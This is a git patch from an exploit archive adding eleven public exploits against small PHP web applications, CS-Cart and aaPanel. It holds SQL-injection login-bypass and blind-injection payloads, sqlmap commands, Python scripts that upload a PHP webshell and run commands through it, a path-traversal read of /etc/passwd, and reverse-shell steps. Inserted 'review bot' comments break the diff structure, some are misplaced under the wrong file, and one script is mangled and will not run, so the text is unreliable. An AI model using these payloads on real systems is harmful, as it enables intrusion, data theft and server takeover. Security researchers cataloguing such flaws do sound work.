From 97ece9d27bf3a7da1304cdf2c62b3d3895c76a90 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Sat, 17 Oct 2020 05:02:09 +0000 Subject: [PATCH] DB: 2020-10-17 11 changes to exploits/shellcodes Employee Management System 1.0 - Cross Site Scripting (Stored) Employee Management System 1.0 - Authentication Bypass Alumni Management System 1.0 - Authentication Bypass Company Visitor Management System (CVMS) 1.0 - Authentication Bypass Restaurant Reservation System 1.0 - 'date' SQL Injection (Authenticated) aaPanel 6.6.6 - Privilege Escalation & Remote Code Execution (Authenticated) Seat Reservation System 1.0 - Remote Code Execution (Unauthenticated) Hotel Management System 1.0 - Remote Code Execution (Authenticated) Seat Reservation System 1.0 - Unauthenticated SQL Injection CS-Cart 1.3.3 - 'classes_dir' LFI CS-Cart 1.3.3 - authenticated RCE --- exploits/php/webapps/48881.txt | 85 ++++++++++++++++++++++ exploits/php/webapps/48882.txt | 35 +++++++++ exploits/php/webapps/48883.txt | 35 +++++++++ exploits/php/webapps/48884.txt | 31 ++++++++ exploits/php/webapps/48885.txt | 56 +++++++++++++++ exploits/php/webapps/48887.py | 61 ++++++++++++++++ exploits/php/webapps/48888.py | 116 ++++++++++++++++++++++++++++++ exploits/php/webapps/48889.txt | 42 +++++++++++ exploits/php/webapps/48890.txt | 12 ++++ exploits/php/webapps/48891.txt | 15 ++++ exploits/python/webapps/48886.txt | 23 ++++++ files_exploits.csv | 11 +++ 12 files changed, 522 insertions(+) create mode 100644 exploits/php/webapps/48881.txt create mode 100644 exploits/php/webapps/48882.txt create mode 100644 exploits/php/webapps/48883.txt create mode 100644 exploits/php/webapps/48884.txt create mode 100644 exploits/php/webapps/48885.txt create mode 100755 exploits/php/webapps/48887.py create mode 100755 exploits/php/webapps/48888.py create mode 100644 exploits/php/webapps/48889.txt create mode 100644 exploits/php/webapps/48890.txt create mode 100644 exploits/php/webapps/48891.txt create mode 100644 exploits/python/webapps/48886.txt 
diff --git a/exploits/php/webapps/48881.txt b/exploits/php/webapps/48881.txt
new file mode 100644
index 000000000..97745746b
--- /dev/null
+++ b/exploits/php/webapps/48881.txt
@@ -0,0 +1,85 @@
+#Exploit Title: Employee Management System 1.0 - Stored Cross Site Scripting
+#Date: 2020-10-16
+#Exploit Author: Ankita Pal
+#Vendor Homepage: https://www.sourcecodester.com/php/14432/employee-management-system-using-php.html
+#Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/employee-management-system.zip
+#Version: 1.0
+#Tested on: Windows 10 + xampp v3.2.4
+
+
+Proof of Concept:::
+
+Step 1: Open the URL localhost:8081/Employee Management System/addemp.php
+
+Step 2: Use payload in First Name and Last Name.
+
+
+Malicious Request:::
+
+POST /Employee%20Management%20System/////process/addempprocess.php HTTP/1.1
+Host: localhost:8081
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------3267707159765331982713791736
+Content-Length: 1571
+Origin: http://localhost:8081
+Connection: close
+Referer: http://localhost:8081/Employee%20Management%20System/////addemp.php
+Cookie: PHPSESSID=infdfigld4et4jndfgbn33kcsv
+Upgrade-Insecure-Requests: 1
+
+-----------------------------3267707159765331982713791736
+Content-Disposition: form-data; name="firstName"
+
+
+-----------------------------3267707159765331982713791736
+Content-Disposition: form-data; name="lastName"
+
+
+-----------------------------3267707159765331982713791736
+Content-Disposition: form-data; name="email"
+
+abc@gmail.com
+-----------------------------3267707159765331982713791736
+Content-Disposition: form-data; name="birthday"
+
+2020-09-28
+-----------------------------3267707159765331982713791736
+Content-Disposition: form-data; name="gender"
+
+Female
+-----------------------------3267707159765331982713791736
+Content-Disposition: form-data; name="contact"
+
+9876543211
+-----------------------------3267707159765331982713791736
+Content-Disposition: form-data; name="nid"
+
+12
+-----------------------------3267707159765331982713791736
+Content-Disposition: form-data; name="address"
+
+Gujarat
+-----------------------------3267707159765331982713791736
+Content-Disposition: form-data; name="dept"
+
+CS
+-----------------------------3267707159765331982713791736
+Content-Disposition: form-data; name="degree"
+
+BE
+-----------------------------3267707159765331982713791736
+Content-Disposition: form-data; name="salary"
+
+
+-----------------------------3267707159765331982713791736
+Content-Disposition: form-data; name="file"; filename=""
+Content-Type: application/octet-stream
+
+
+-----------------------------3267707159765331982713791736--
+
+
+Cookie will be reflected on View Employee.
\ No newline at end of file
diff --git a/exploits/php/webapps/48882.txt b/exploits/php/webapps/48882.txt
new file mode 100644
index 000000000..0c9c27c4f
--- /dev/null
+++ b/exploits/php/webapps/48882.txt
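Review bot: The multipart body shows empty values for the `firstName` and `lastName` parts, so the stored-XSS vector the title claims is never actually demonstrated — the payload appears to have been stripped, and the only observable effect described is `Cookie will be reflected on View Employee.` For anyone triaging this, the advisory should name the page that renders those two fields without HTML-encoding them and the corresponding fix (encode on output, e.g. htmlspecialchars, rather than trusting stored data). The Step 1 URL is also written unencoded (`localhost:8081/Employee Management System/addemp.php`) while the request line and Referer use `%20` plus a run of slashes (`/////process/`), which reads as two different captures pasted together.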
@@ -0,0 +1,35 @@
+#Exploit Title: Employee Management System 1.0 - Authentication Bypass
+#Date: 2020-10-16
+#Exploit Author: Ankita Pal
+#Vendor Homepage: https://www.sourcecodester.com/php/14432/employee-management-system-using-php.html
+#Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/employee-management-system.zip
+#Version: 1.0
+#Tested on: Windows 10 + xampp v3.2.4
+
+
+Proof of Concept:::
+
+Step 1: Open the URL http://localhost:8081/Employee%20Management%20System/alogin.html
+
+Step 2: Use payload anki' or 1=1# for both username and password.
+
+
+Malicious Request:::
+
+POST /Employee%20Management%20System/process/aprocess.php HTTP/1.1
+Host: localhost:8081
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 70
+Origin: http://localhost:8081
+Connection: close
+Referer: http://localhost:8081/Employee%20Management%20System/alogin.html
+Cookie: PHPSESSID=infdfigld4et4jndfgbn33kcsv
+Upgrade-Insecure-Requests: 1
+
+mailuid=anki%27+or+1%3D1%23&pwd=anki%27+or+1%3D1%23&login-submit=Login
+
+You will be login as Admin of the application.
\ No newline at end of file
diff --git a/exploits/php/webapps/48883.txt b/exploits/php/webapps/48883.txt
new file mode 100644
index 000000000..d6258979e
--- /dev/null
+++ b/exploits/php/webapps/48883.txt
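Review bot: The advisory reproduces the injected login parameters (`mailuid=anki%27+or+1%3D1%23&pwd=...` posted to `process/aprocess.php`) but never states which query is built from them or what the fix is, so a defender gets a reproduction without a root cause; the same gap is present in 48883 (`ajax.php?action=login`), 48884 (`/cvms/index.php`), 48885 (`includes/reservation.inc.php`, which at least names the file) and 48889 (`admin_class.php`). One sentence per entry — the login/reservation handler concatenates the request parameters into the SQL string instead of binding them through a prepared statement — would let maintainers locate and patch the defect rather than only confirm it. The captured `Content-Length: 70` is specific to this exact body and is part of the capture, not of the issue, which is worth saying so readers do not take it as significant.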
@@ -0,0 +1,35 @@
+#Exploit Title: Alumni Management System 1.0 - Authentication Bypass
+#Date: 2020-10-16
+#Exploit Author: Ankita Pal
+#Vendor Homepage: https://www.sourcecodester.com/php/14524/alumni-management-system-using-phpmysql-source-code.html
+#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/alumni-management-system.zip
+#Version: V1.0
+#Tested on: Windows 10 + xampp v3.2.4
+
+
+Proof of Concept:::
+
+Step 1: Open the URL http://localhost:8081/alumni-management-system/alumni/admin/login.php
+
+Step 2: use payload anki' or 1=1# for both username and password.
+
+
+Malicious Request:::
+
+POST /alumni-management-system/alumni/admin/ajax.php?action=login HTTP/1.1
+Host: localhost:8081
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
+Accept: */*
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 53
+Origin: http://localhost:8081
+Connection: close
+Referer: http://localhost:8081/alumni-management-system/alumni/admin/login.php
+Cookie: PHPSESSID=infdfigld4et4jndfgbn33kcsv
+
+username=anki'+or+1%3D1%23&password=anki'+or+1%3D1%23
+
+You will be login as admin of the application.
\ No newline at end of file
diff --git a/exploits/php/webapps/48884.txt b/exploits/php/webapps/48884.txt
new file mode 100644
index 000000000..cbd9d9833
--- /dev/null
+++ b/exploits/php/webapps/48884.txt
@@ -0,0 +1,31 @@
+# Exploit Title: Company Visitor Management System (CVMS) 1.0 - Authentication Bypass
+# Date: 16/10/2020
+# Exploit Author: Oğuz Türkgenç
+# Vendor Homepage: https://phpgurukul.com/company-visitor-management-system-using-php-and-mysql/
+# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=9602
+# Version: 1.0
+# Tested On: Windows 7 Enterprise SP1 + XAMPP V3.2.3
+
+Step 1: Open the URL http://localhost/cvms/index.php
+
+Step 2: use payload ot' or 1=1# in user and password field
+
+Malicious Request
+
+POST /cvms/index.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.175.128/cvms/index.php
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 36
+Origin: http://localhost
+Connection: close
+Cookie: lang=english; PHPSESSID=qkg4nmdq97r4jkvkm4raa34660
+Upgrade-Insecure-Requests: 1
+
+username=ot%27+or+1%3D1+%23&password=ot%27+or+1%3D1+%23&login=
+
+Step 3: You will be logged in as admin.
\ No newline at end of file
diff --git a/exploits/php/webapps/48885.txt b/exploits/php/webapps/48885.txt
new file mode 100644
index 000000000..ecc98b5e1
--- /dev/null
+++ b/exploits/php/webapps/48885.txt
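Review bot: The captured request is internally inconsistent: `Host: localhost` and `Origin: http://localhost` sit next to `Referer: http://192.168.175.128/cvms/index.php`, which suggests the headers were hand-edited after capture rather than taken from one session. The `# Date: 16/10/2020` also uses a day-first format while every other entry in this commit uses ISO `YYYY-MM-DD`, so the index date cannot be cross-checked against the file at a glance. Normalising both to a single origin and the ISO date would make the entry consistent with its siblings.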
@@ -0,0 +1,56 @@
+# Exploit Title: Restaurant Reservation System 1.0 - 'date' SQL Injection (Authenticated)
+# Date: 2020-10-05
+# Exploit Author: b1nary
+# Vendor Homepage: https://www.sourcecodester.com/php/14482/restaurant-reservation-system-php-full-source-code-2020.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/restaurants_3.zip
+# Version: 1.0
+# Tested on: Linux + Apache2
+
+------------------------------------------------------------------------------------
+
+1. Description:
+----------------------
+
+Restaurant Reservation System 1.0 allows SQL Injection via parameter 'date' in
+includes/reservation.inc.php. Exploiting this issue could allow an attacker to compromise
+the application, access or modify data, or exploit latent vulnerabilities
+in the underlying database.
+
+
+2. Proof of Concept:
+----------------------
+
+In Burpsuite intercept the request from the affected page with
+'date' parameter and save it like re.req. Then run SQLmap to extract the
+data from the database:
+
+sqlmap -r re.req --dbms=mysql
+
+
+3. Example payload:
+----------------------
+
+(time-based blind)
+
+fname=user&lname=user&date=2020-10-14' AND (SELECT 1934 FROM (SELECT(SLEEP(5)))lmWi) AND
+'navS'='navS&time=16:00 - 20:00&num_guests=2&tele=123456789&comments=null&reserv-submit=
+
+
+4. Burpsuite request:
+----------------------
+
+POST /restaurant/includes/reservation.inc.php HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 117
+Origin: http://127.0.0.1
+DNT: 1
+Connection: close
+Referer: http://127.0.0.1/restaurant/reservation.php
+Cookie: PHPSESSID=r355njdkuddu4ac0a784i9i69m
+Upgrade-Insecure-Requests: 1
+
+fname=user&lname=user&date=2020-10-14&time=16%3A00+-+20%3A00&num_guests=2&tele=123456789&comments=null&reserv-submit=
\ No newline at end of file
diff --git a/exploits/php/webapps/48887.py b/exploits/php/webapps/48887.py
new file mode 100755
index 000000000..9e57eba80
--- /dev/null
+++ b/exploits/php/webapps/48887.py
@@ -0,0 +1,61 @@
+# Exploit Title: Seat Reservation System 1.0 - Unauthenticated Remote Code Execution
+# Exploit Author: Rahul Ramkumar
+# Date: 2020-09-16
+# Vendor Homepage: www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/seat-reservation-system-using-php_0.zip
+# Version: 1.0
+# Tested On: Windows 10 Enterprise 1809 (x64_86) + XAMPP 7.2.33-1
+# Exploit Tested Using: Python 2.7.18
+# CVE: CVE-2020-25763
+# Vulnerability Description:
+# Seat Reservation System version 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading PHP files.
+
+import requests, sys, urllib, re
+from lxml import etree
+from io import StringIO
+from colorama import Fore, Back, Style
+requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
+import random
+import string
+
+def print_usage(STRING):
+ return Style.BRIGHT+Fore.YELLOW+STRING+Fore.RESET
+
+if __name__ == "__main__":
+ if len(sys.argv) != 2:
+ print print_usage("Usage:\t\t python %s " % sys.argv[0])
+ print print_usage("Example:\t python %s 'https://192.168.1.72:443/seat_reservation/'" % sys.argv[0])
+ sys.exit(-1)
+ SERVER_URL = sys.argv[1]
+ UPLOAD_DIR = 'admin/ajax.php?action=save_movie'
+ UPLOAD_URL = SERVER_URL + UPLOAD_DIR
+ random = ''.join([random.choice(string.ascii_letters + string.digits) for n in xrange(16)])
+ webshell = random+'.php'
+
+ s = requests.Session()
+ s.get(SERVER_URL, verify=False)
+ image = {
+ 'cover':
+ (
+ webshell,
+ '',
+ 'application/php',
+ {'Content-Disposition': 'form-data'}
+ )
+ }
+ fdata = {'id': '','title':'Shelling','description':'','duration_hour':'3','duration_min':'0','date_showing':'2020-01-01','end_date':'2040-09-25'}
+ r1 = s.post(url=UPLOAD_URL, files=image, data=fdata, verify=False)
+ r2 = s.get(SERVER_URL, verify=False)
+ response_page = r2.content.decode("utf-8")
+ parser = etree.HTMLParser()
+tree = etree.parse(StringIO(response_page), parser=parser)
+ def get_links(tree):
+ refs = tree.xpath("//img")
+ links = [link.get('src', '') for link in refs]
+ return [l for l in links]
+
+ links = get_links(tree)
+ print('Access your webshell at: ')
+ for link in links:
+ if webshell in link:
+ print(SERVER_URL + link+'?d3crypt=whoami')
\ No newline at end of file
diff --git a/exploits/php/webapps/48888.py b/exploits/php/webapps/48888.py
new file mode 100755
index 000000000..f8e78c966
--- /dev/null
+++ b/exploits/php/webapps/48888.py
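Review bot: `random = ''.join([random.choice(string.ascii_letters + string.digits) for n in xrange(16)])` rebinds the name of the imported `random` module to a string inside `__main__`; it only works because the module is never used again afterwards, and a local such as `rand_name` would avoid the shadowing — `urllib` and `re` are also imported but never used. The header documents only `# Exploit Tested Using: Python 2.7.18`, yet the file depends on the non-stdlib packages `requests`, `lxml` and `colorama`, which should be listed alongside it (`# Requires: requests, lxml, colorama`) given that `print print_usage(...)` and `xrange` already pin the script to Python 2. For the defensive reader, the description would be more useful with the root cause stated: the `save_movie` handler appears to accept the `cover` part with a client-chosen `.php` filename and `application/php` type and then serve it from the path that shows up in `<img src>`, so the fix is a server-side extension allowlist for images, renaming on save, and storing uploads outside the executable web root — confirm against the application source before publishing that wording.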
@@ -0,0 +1,116 @@
+# Exploit Title: Hotel Management System 1.0 - Remote Code Execution (Authenticated)
+# Google Dork: N/A
+# Date: 2020-09-23
+# Exploit Author: Eren Şimşek
+# Vendor Homepage: https://www.sourcecodester.com/php/14458/hotel-management-system-project-using-phpmysql.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/hotel-management-system-using-php.zip
+# Version: 1.0
+# Tested on: Windows/Linux - XAMPP Server
+# CVE : N/A
+
+# Setup: pip3 install bs4 .
+
+# Exploit Code :
+
+import requests,sys,string,random
+from bs4 import BeautifulSoup
+
+def get_random_string(length):
+letters = string.ascii_lowercase
+result_str = ''.join(random.choice(letters) for i in range(length))
+return result_str
+
+session = requests.session()
+Domain = ""
+RandomFileName = get_random_string(5)+".php"
+def Help():
+print("[?] Usage: python AporlorRCE.py ")
+
+def Upload():
+burp0_url = Domain+"/admin/ajax.php?action=save_category"
+burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0)
+Gecko/20100101 Firefox/68.0", "Accept": "*/*", "Accept-Language":
+"tr,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Referer": "
+http://192.168.1.104/admin/index.php?page=categories", "X-Requested-With":
+"XMLHttpRequest", "Content-Type": "multipart/form-data;
+boundary=---------------------------11915271121184037197158049421",
+"Connection": "close"}
+burp0_data = "-----------------------------11915271121184037197158049421\r\nContent-Disposition:
+form-data; name=\"id\"\r\n\r\n\r\n
+-----------------------------11915271121184037197158049421\r\nContent-Disposition:
+form-data; name=\"name\"\r\n\r\n1\r\n
+-----------------------------11915271121184037197158049421\r\nContent-Disposition:
+form-data; name=\"price\"\r\n\r\n1\r\n
+-----------------------------11915271121184037197158049421\r\nContent-Disposition:
+form-data; name=\"img\"; filename=\""+RandomFileName+"\"\r\nContent-Type:
+application/x-php\r\n\r\n\n\r\n
+-----------------------------11915271121184037197158049421--\r\n"
+try:
+Resp = session.post(burp0_url, headers=burp0_headers, data=burp0_data)
+if Resp.text == "1":
+print("[+] Shell Upload Success")
+else:
+print("[-] Shell Upload Failed")
+except:
+print("[-] Request Failed")
+Help()
+
+def Login():
+burp0_url = Domain+"/admin/ajax.php?action=login"
+burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0)
+Gecko/20100101 Firefox/68.0", "Accept": "*/*", "Accept-Language":
+"tr,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Referer": "
+http://localhost/fos/admin/login.php", "Content-Type":
+"application/x-www-form-urlencoded;
+charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Connection": "close"}
+burp0_data = {"username": "' OR 1=1 #", "password": "' OR 1=1 #"}
+try:
+Resp = session.post(burp0_url, headers=burp0_headers,data=burp0_data)
+if Resp.text == "1":
+print("[+] Login Success")
+else:
+print("[+] Login Failed")
+except:
+print("[-] Request Failed")
+Help()
+
+def FoundMyRCE():
+global FileName
+burp0_url = Domain+"/admin/index.php?page=categories"
+burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0)
+Gecko/20100101 Firefox/68.0", "Accept":
+"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
+"Accept-Language": "tr,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip,
+deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
+try:
+Resp = session.get(burp0_url, headers=burp0_headers)
+Soup = BeautifulSoup(Resp.text, "html5lib")
+Data = Soup.find_all("img")
+for MyRCE in Data:
+if RandomFileName in MyRCE["src"]:
+FileName = MyRCE["src"].strip("../assets/img/")
+print("[+] Found File Name: " + MyRCE["src"].strip("../assets/img/"))
+except:
+print("[-] Request Failed")
+Help()
+
+def Terminal():
+while True:
+Command = input("Console: ")
+burp0_url = Domain+"/assets/img/"+FileName+"?cmd="+Command
+try:
+Resp = session.get(burp0_url)
+print(Resp.text)
+except KeyboardInterrupt:
+print("[+] KeyboardInterrupt Stop, Thanks For Use Aporlorxl23")
+except:
+print("[-] Request Error")
+if __name__ == "__main__":
+if len(sys.argv) == 2:
+Domain = sys.argv[1]
+Login()
+Upload()
+FoundMyRCE()
+Terminal()
+else:
+Help()
\ No newline at end of file
diff --git a/exploits/php/webapps/48889.txt b/exploits/php/webapps/48889.txt
new file mode 100644
index 000000000..a047c0d48
--- /dev/null
+++ b/exploits/php/webapps/48889.txt
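Review bot: As committed the file is not valid Python: every function body sits at column 0 (`def get_random_string(length):` is followed directly by `letters = string.ascii_lowercase`), and the `burp0_headers` dict literals and the `burp0_data` string in `Upload()`, `Login()` and `FoundMyRCE()` are broken across physical lines inside quotes, so the first definition already fails to parse; this looks like mail-client wrapping of the submission rather than the author's source, and an intake check as simple as `python3 -m py_compile` would have caught it before the entry was indexed. The metadata is also inconsistent: the header says `# Exploit Author: Eren Şimşek` while the `files_exploits.csv` row for 48888 credits `Aporlorxl23`, and the title says `(Authenticated)` although `Login()` posts `' OR 1=1 #` as both username and password, so no valid credential is needed — defenders rating severity should treat it as an unauthenticated chain (SQL-injection login bypass followed by an unrestricted upload through `save_category`). The bare `except:` clauses swallow every exception, including `SystemExit`, and then print the generic `[-] Request Failed`, which hides the actual error from the user.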
@@ -0,0 +1,42 @@
+# Title: Seat Reservation System 1.0 - Unauthenticated SQL Injection
+# Exploit Author: Rahul Ramkumar
+# Date: 2020-09-16
+# Vendor Homepage: www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/seat-reservation-system-using-php_0.zip
+# Version: 1.0
+# Tested On: Windows 10 Enterprise 1809 (x64_86) + XAMPP 7.2.33-1
+# CVE: CVE-2020-25762
+# Description
+
+The file admin_class.php does not perform input validation on the username and password parameters. An attacker can send malicious input in the post request to /admin/ajax.php?action=login and bypass authentication, extract sensitive information etc.
+
+#POC
+
+1) Navigate to the admin login page
+
+Example:
+
+http://192.168.1.72/seat_reservation/admin/login.php
+
+2) Fill in dummy values for 'username' and 'password' fields and send the request via an HTTP intercept tool
+
+3) Save the request to file. Example, seat_reservation_sqli.req
+
+POST /seat_reservation/admin/ajax.php?action=login HTTP/1.1
+Host: 192.168.1.72
+User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 32
+Origin: http://192.168.1.72
+DNT: 1
+Connection: close
+
+username=admin&password=dummy
+
+4) Run SQLmap on the file,
+
+sqlmap -r seat_reservation_sqli.req --dbms=mysql --threads=10
\ No newline at end of file
diff --git a/exploits/php/webapps/48890.txt b/exploits/php/webapps/48890.txt
new file mode 100644
index 000000000..51988b22a
--- /dev/null
+++ b/exploits/php/webapps/48890.txt
@@ -0,0 +1,12 @@
+# Exploit Title: CS-Cart unauthenticated LFI
+# Date: 2020-09-22
+# Exploit Author: 0xmmnbassel
+# Vendor Homepage: https://www.cs-cart.com/e-commerce-platform.html
+# Tested at: ver. 1.3.4
+# Vulnerability Type: unauthenticated LFI
+
+
+http://www.site.com/[CS-Cart_path]/classes/phpmailer/class.cs_phpmailer.php?classes_dir=[evil_scripts]%00
+example:
+http://www.site.com/[CS-Cart_path]/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00
+http://www.site.com/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00
\ No newline at end of file
diff --git a/exploits/php/webapps/48891.txt b/exploits/php/webapps/48891.txt
new file mode 100644
index 000000000..f4b71d5c0
--- /dev/null
+++ b/exploits/php/webapps/48891.txt
@@ -0,0 +1,15 @@
+# Exploit Title: CS-Cart authenticated RCE
+# Date: 2020-09-22
+# Exploit Author: 0xmmnbassel
+# Vendor Homepage: https://www.cs-cart.com/e-commerce-platform.html
+# Tested at: ver. 1.3.3
+# Vulnerability Type: authenticated RCE
+
+
+
+get PHP shells from
+http://pentestmonkey.net/tools/web-shells/php-reverse-shell
+edit IP && PORT
+Upload to file manager
+change the extension from .php to .phtml
+visit http://[victim]/skins/shell.phtml --> Profit. ...!
\ No newline at end of file
diff --git a/exploits/python/webapps/48886.txt b/exploits/python/webapps/48886.txt
new file mode 100644
index 000000000..176cbbab1
--- /dev/null
+++ b/exploits/python/webapps/48886.txt
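Review bot: The version in the 48890 header (`# Tested at: ver. 1.3.4`) disagrees with the commit subject and the `files_exploits.csv` row, which both say `CS-Cart 1.3.3`; one of them is wrong, and the affected-version field is exactly what defenders key on when matching an advisory against an inventory. The `%00` at the end of `classes_dir=...%00` means the include-path traversal relies on null-byte truncation, which PHP stopped honouring in 5.3.4, so the entry should state the PHP version it was reproduced on as an environment caveat rather than leaving the reader to infer it. The sibling 48891 hunk on this same line likewise gives no root cause for the `.phtml` upload (which file manager, which extension check it passes), so the fix — a server-side extension allowlist on the file manager and not mapping `.phtml` to the PHP handler under `skins/` — cannot be derived from the text as written.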
@@ -0,0 +1,23 @@
+# Exploit Title: [aaPanel 6.6.6 - Authenticated Privilege Escalation]
+# Google Dork: []
+# Date: [04.05.2020]
+# Exploit Author: [Ünsal Furkan Harani (Zemarkhos)]
+# Vendor Homepage: [https://www.aapanel.com/](https://www.aapanel.com/)
+# Software Link: [https://github.com/aaPanel/aaPanel](https://github.com/aaPanel/aaPanel)
+# Version: [6.6.6] (REQUIRED)
+# Tested on: [Linux ubuntu 4.4.0-131-generic #157-Ubuntu SMP Thu Jul 12 15:51:36 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux]
+# CVE : [CVE-2020-14421]
+
+if you are logged was admin;
+
+1- go to the crontab
+
+2- select shell script and paste your reverse shell code
+
+3- click execute button and you are now root.
+
+because crontab.py running with root privileges.
+
+Remote Code Execution
+
+https://github.com/jenaye/aapanel
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 5d94c7df3..df3f74600 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
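Review bot: The header still carries the unfilled template brackets and markdown (`# Google Dork: []`, `# Version: [6.6.6] (REQUIRED)`, `[https://www.aapanel.com/](https://www.aapanel.com/)`), and `# Date: [04.05.2020]` is ambiguous between day-first and month-first next to the ISO dates used everywhere else in this commit. The entry defers the actual detail to an external link (`https://github.com/jenaye/aapanel`), so it is not self-contained if that repository disappears. The one line of root cause — `because crontab.py running with root privileges` — is the part defenders need and deserves a clearer statement that any account able to create cron entries in the panel is effectively root on the host, which is what the severity rating and the mitigation (run the panel's job executor as an unprivileged service account, or restrict cron creation to trusted admins) should reflect.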
@@ -40699,6 +40699,17 @@ id,file,description,date,author,type,platform,port
 48878,exploits/php/webapps/48878.py,"rConfig 3.9.5 - Remote Code Execution (Unauthenticated)",2020-10-15,"Daniel Monzón",webapps,php,
 48879,exploits/php/webapps/48879.txt,"Simple Grocery Store Sales And Inventory System 1.0 - Authentication Bypass",2020-10-15,"Saurav Shukla",webapps,php,
 48880,exploits/php/webapps/48880.txt,"Zoo Management System 1.0 - Authentication Bypass",2020-10-15,"Jyotsna Adhana",webapps,php,
+48881,exploits/php/webapps/48881.txt,"Employee Management System 1.0 - Cross Site Scripting (Stored)",2020-10-16,"Ankita Pal",webapps,php,
+48882,exploits/php/webapps/48882.txt,"Employee Management System 1.0 - Authentication Bypass",2020-10-16,"Ankita Pal",webapps,php,
+48883,exploits/php/webapps/48883.txt,"Alumni Management System 1.0 - Authentication Bypass",2020-10-16,"Ankita Pal",webapps,php,
+48884,exploits/php/webapps/48884.txt,"Company Visitor Management System (CVMS) 1.0 - Authentication Bypass",2020-10-16,"Oğuz Türkgenç",webapps,php,
+48885,exploits/php/webapps/48885.txt,"Restaurant Reservation System 1.0 - 'date' SQL Injection (Authenticated)",2020-10-16,b1nary,webapps,php,
+48886,exploits/python/webapps/48886.txt,"aaPanel 6.6.6 - Privilege Escalation & Remote Code Execution (Authenticated)",2020-10-16,"Ünsal Furkan Harani",webapps,python,
+48887,exploits/php/webapps/48887.py,"Seat Reservation System 1.0 - Remote Code Execution (Unauthenticated)",2020-10-16,"Rahul Ramkumar",webapps,php,
+48888,exploits/php/webapps/48888.py,"Hotel Management System 1.0 - Remote Code Execution (Authenticated)",2020-10-16,Aporlorxl23,webapps,php,
+48889,exploits/php/webapps/48889.txt,"Seat Reservation System 1.0 - Unauthenticated SQL Injection",2020-10-16,"Rahul Ramkumar",webapps,php,
+48890,exploits/php/webapps/48890.txt,"CS-Cart 1.3.3 - 'classes_dir' LFI",2020-10-16,0xmmnbassel,webapps,php,
+48891,exploits/php/webapps/48891.txt,"CS-Cart 1.3.3 - authenticated RCE",2020-10-16,0xmmnbassel,webapps,php,
 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,